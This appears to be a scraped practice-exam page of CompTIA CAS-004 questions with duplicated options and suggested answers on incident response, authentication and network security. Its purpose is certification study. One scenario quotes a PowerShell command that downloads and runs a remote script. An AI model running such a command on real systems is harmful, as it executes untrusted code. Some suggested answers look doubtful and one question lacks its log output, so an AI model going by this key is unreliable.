ExamGecko
Home Home / CompTIA / CAS-004

CompTIA CAS-004 Practice Test - Questions Answers, Page 13

Question list
Search
Search

List of questions

Search

Related questions











A company in the financial sector receives a substantial number of customer transaction requests via email. While doing a root-cause analysis conceding a security breach, the CIRT correlates an unusual spike in port 80 traffic from the IP address of a desktop used by a customer relations employee who has access to several of the compromised accounts. Subsequent antivirus scans of the device do not return an findings, but the CIRT finds undocumented services running on the device. Which of the following controls would reduce the discovery time for similar in the future.

A.
Implementing application blacklisting
A.
Implementing application blacklisting
Answers
B.
Configuring the mall to quarantine incoming attachment automatically
B.
Configuring the mall to quarantine incoming attachment automatically
Answers
C.
Deploying host-based firewalls and shipping the logs to the SIEM
C.
Deploying host-based firewalls and shipping the logs to the SIEM
Answers
D.
Increasing the cadence for antivirus DAT updates to twice daily
D.
Increasing the cadence for antivirus DAT updates to twice daily
Answers
Suggested answer: C

A cybersecurity analyst receives a ticket that indicates a potential incident is occurring. There has been a large in log files generated by a generated by a website containing a ''Contact US'' form. The analyst must determine if the increase in website traffic is due to a recent marketing campaign of if this is a potential incident. Which of the following would BEST assist the analyst?

A.
Ensuring proper input validation is configured on the ''Contact US'' form
A.
Ensuring proper input validation is configured on the ''Contact US'' form
Answers
B.
Deploy a WAF in front of the public website
B.
Deploy a WAF in front of the public website
Answers
C.
Checking for new rules from the inbound network IPS vendor
C.
Checking for new rules from the inbound network IPS vendor
Answers
D.
Running the website log files through a log reduction and analysis tool
D.
Running the website log files through a log reduction and analysis tool
Answers
Suggested answer: D

The OS on several servers crashed around the same time for an unknown reason. The servers were restored to working condition, and all file integrity was verified. Which of the following should the incident response team perform to understand the crash and prevent it in the future?

A.
Root cause analysis
A.
Root cause analysis
Answers
B.
Continuity of operations plan
B.
Continuity of operations plan
Answers
C.
After-action report
C.
After-action report
Answers
D.
Lessons learned
D.
Lessons learned
Answers
Suggested answer: A

A company is repeatedly being breached by hackers who valid credentials. The company's Chief information Security Officer (CISO) has installed multiple controls for authenticating users, including biometric and token-based factors. Each successive control has increased overhead and complexity but has failed to stop further breaches. An external consultant is evaluating the process currently in place to support the authentication controls. Which of the following recommendation would MOST likely reduce the risk of unauthorized access?

A.
Implement strict three-factor authentication.
A.
Implement strict three-factor authentication.
Answers
B.
Implement least privilege policies
B.
Implement least privilege policies
Answers
C.
Switch to one-time or all user authorizations.
C.
Switch to one-time or all user authorizations.
Answers
D.
Strengthen identify-proofing procedures
D.
Strengthen identify-proofing procedures
Answers
Suggested answer: A

A company recently acquired a SaaS provider and needs to integrate its platform into the company's existing infrastructure without impact to the customer's experience. The SaaS provider does not have a mature security program A recent vulnerability scan of the SaaS provider's systems shows multiple critical vulnerabilities attributed to very old and outdated Oss. Which of the following solutions would prevent these vulnerabilities from being introduced into the company's existing infrastructure?

A.
Segment the systems to reduce the attack surface if an attack occurs
A.
Segment the systems to reduce the attack surface if an attack occurs
Answers
B.
Migrate the services to new systems with a supported and patched OS.
B.
Migrate the services to new systems with a supported and patched OS.
Answers
C.
Patch the systems to the latest versions of the existing OSs
C.
Patch the systems to the latest versions of the existing OSs
Answers
D.
Install anti-malware. HIPS, and host-based firewalls on each of the systems
D.
Install anti-malware. HIPS, and host-based firewalls on each of the systems
Answers
Suggested answer: B

An organization decided to begin issuing corporate mobile device users microSD HSMs that must be installed in the mobile devices in order to access corporate resources remotely. Which of the following features of these devices MOST likely led to this decision? (Select TWO.)

A.
Software-backed keystore
A.
Software-backed keystore
Answers
B.
Embedded cryptoprocessor
B.
Embedded cryptoprocessor
Answers
C.
Hardware-backed public key storage
C.
Hardware-backed public key storage
Answers
D.
Support for stream ciphers
D.
Support for stream ciphers
Answers
E.
Decentralized key management
E.
Decentralized key management
Answers
F.
TPM 2.0 attestation services
F.
TPM 2.0 attestation services
Answers
Suggested answer: B, C

A security consultant needs to set up wireless security for a small office that does not have Active Directory. Despite the lack of central account management, the office manager wants to ensure a high level of defense to prevent brute-force attacks against wireless authentication.

Which of the following technologies would BEST meet this need?

A.
Faraday cage
A.
Faraday cage
Answers
B.
WPA2 PSK
B.
WPA2 PSK
Answers
C.
WPA3 SAE
C.
WPA3 SAE
Answers
D.
WEP 128 bit
D.
WEP 128 bit
Answers
Suggested answer: C

Explanation:

WPA3 SAE prevents brute-force attacks.

''WPA3 Personal (WPA-3 SAE) Mode is a static passphrase-based method. It provides better security than what WPA2 previously provided, even when a non-complex password is used, thanks to Simultaneous Authentication of Equals (SAE), the personal authentication process of WPA3.''

A security analyst has noticed a steady increase in the number of failed login attempts to the external-facing mail server. During an investigation of one of the jump boxes, the analyst identified the following in the log file: powershell EX(New-Object Net.WebClient).DownloadString ('https://content.comptia.org/casp/whois.psl');whois

Which of the following security controls would have alerted and prevented the next phase of the attack?

A.
Antivirus and UEBA
A.
Antivirus and UEBA
Answers
B.
Reverse proxy and sandbox
B.
Reverse proxy and sandbox
Answers
C.
EDR and application approved list
C.
EDR and application approved list
Answers
D.
Forward proxy and MFA
D.
Forward proxy and MFA
Answers
Suggested answer: C

Explanation:

An EDR and whitelist should protect from this attack.

The Chief Information Security Officer of a startup company has asked a security engineer to implement a software security program in an environment that previously had little oversight.

Which of the following testing methods would be BEST for the engineer to utilize in this situation?

A.
Software composition analysis
A.
Software composition analysis
Answers
B.
Code obfuscation
B.
Code obfuscation
Answers
C.
Static analysis
C.
Static analysis
Answers
D.
Dynamic analysis
D.
Dynamic analysis
Answers
Suggested answer: C

A security auditor needs to review the manner in which an entertainment device operates. The auditor is analyzing the output of a port scanning tool to determine the next steps in the security review. Given the following log output.

The best option for the auditor to use NEXT is:


A.
A SCAP assessment.
A.
A SCAP assessment.
Answers
B.
Reverse engineering
B.
Reverse engineering
Answers
C.
Fuzzing
C.
Fuzzing
Answers
D.
Network interception.
D.
Network interception.
Answers
Suggested answer: A
Total 510 questions
Go to page: of 51